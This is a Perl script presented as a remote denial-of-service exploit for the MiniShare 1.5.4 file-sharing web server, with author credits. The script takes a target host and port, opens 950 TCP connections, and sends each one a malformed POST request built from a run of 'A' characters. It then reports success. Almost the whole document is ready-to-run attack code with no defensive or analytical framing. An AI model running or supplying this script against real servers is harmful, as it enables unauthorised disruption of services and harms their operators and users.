MiniShare version 1.5.4 remote denial of service exploit.
70b307f80da9050335fe8e40da058abaf226f5bff0bef5ababe7c292043d8241
#!/usr/bin/perl
###########################################
# MiniShare 1.5.4 Denial Of Service
#
# Site: http://minishare.sourceforge.net/
#
#
# Coded by device - geeksytem[at]gmail[dot]com
# http://geekmind.altervista.org
###########################################
use strict;
use warnings;
use IO::Socket;
sub usage{
print "Usage: script.pl host port\n\n";
}
print "------------------------------\n";
print "MiniShare 1.5.4 DoS\n";
print "------------------------------\n";
print "Coded by device\n";
print "geeksystem[at]gmail[dot]com\n";
print "http://geekmind.altervista.org\n\n";
if (@ARGV < 2) { &usage; exit;}
my $host = $ARGV[0];
my $port = $ARGV[1];
my $time = '950';
my $req = 'A'x40;
for (my $i=1; $i<=$time; $i++)
{
my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"$port")
or die "[+] Connecting ... Could not connect to host.\n\n";
print $sock "POST /".$req." HTTP/1.1 \n\n";
}
print "Exploit succeeded\n\n";